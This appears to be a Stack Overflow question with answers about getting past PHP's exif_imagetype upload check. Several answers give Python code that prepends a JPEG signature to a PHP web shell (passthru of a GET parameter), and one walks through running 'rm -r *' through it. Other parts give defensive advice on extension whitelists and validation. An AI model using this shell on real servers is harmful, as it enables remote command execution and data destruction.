# How to bypass the exif_imagetype function to upload php code?

Tags: php, file-upload

I read that **exif_imagetype** is secure function to avoid uploading php or other shell code instead of image file. Recently i read another article that we can bypass this secure function by some simple methods. So if someone knows the exact method to bypass can u share your answers.

I used following code in my php script so i wanted to know this is vulnerable or not and remedy for the same

```
 if (! exif_imagetype($_FILES['upload']['tmp_name'])) 
   { 
    echo "File is not an image";
   }
```

Comment: The first line of the manual says: *"exif_imagetype() reads the first bytes of an image and checks its signature."* - So spoofing the first couple of bytes to look like an image signature will do it.

Comment: What is your real-world situation that you need this for?

Comment: if you handle the images correctly no code will be executed regardless of being code in the image or not. It could just be by accident that an image file contains the sequence `<?php ... ?>`

Comment: I found this, with a simple python script and good explainations: http://raidersec.blogspot.com/2012/10/overthewire-natas-wargame-level-13.html

Comment: Funny, how looking for `exif_imagetype` documentation for overthewire ctf challenges brings this up first.

Answer (score 13):

Based on Mr. @jake_the_snake's answer, I would also include a quick code sample in Python

```
>>> fh = open('shell.php', 'w')
>>> fh.write('\xFF\xD8\xFF\xE0' + '<? passthru($_GET["cmd"]); ?>')
>>> fh.close()
```

Comment: For python3 see: @FazeL's answer below: https://stackoverflow.com/a/66094894/10353264

Answer (score 10):

It's a bit more complicated that just running exif_imagetype. That function simply checks the magic number at the beginning of the file, so more checks are needed. Without more knowledge of your software, it's hard to make a judgement, but consider this example:

I construct "shell.php" with the JPEG magic number 0xFFD8FFE0 followed by the string `<? passthru($_GET["cmd"]); ?>`.

I upload it to your server. The magic number bypasses `exif_imagetype`. The file is uploaded to `www.your-domain.com/uploads/shell.php`. I then navigate to `www.your-domain.com/uploads/shell.php?rm -r *`. The server finds the starting `<?` and starts interpreting PHP. Yay! I've deleted all your uploads assuming you're running on a Linux webserver.

Even doing a deeper check on the validity of the image won't help, because I could include my malicious script in the metadata of the image. This is only prevented by using a whitelist of file extensions.

[TL;DR] It's not secure without more checking. You need to ensure an appropriate file name, use a whitelist of file extensions, limit file size, and perform standard security measures.

Comment: All these functions just checks the magic number in the beginning of the file: exif_imagetype, mime_content_type, finfo_file. But getimagesize and imagecreatefromjpeg will fail parsing this, plus this only works if the file extension is .php, unless you have your apache/nginx parsing other files as php.

Answer (score 4):

@solidak 's answer works for `python2` since it is deprecated now, here is a `Python3` rewrite:

```
>>> fh = open('shell.php', 'wb')
>>> fh.write(b'\xFF\xD8\xFF\xE0' + b'<? passthru($_GET["cmd"]); ?>')
>>> fh.close()
```

Answer (score -5):

For security i use

```
$extension = pathinfo($_FILES['upload']['name'], PATHINFO_EXTENSION);

if(!in_array(strtolower($extension), array('jpg', 'jpeg', 'png', 'gif')))
{
    echo "File is not an image";
}
```

Comment: This is not secure in any way. Not only does it incorrectly address the problem, but it is completely vulnerable to anyone who simply renames their file to have `.png` or `.jpg` at the end, allowing for basically any unknown code.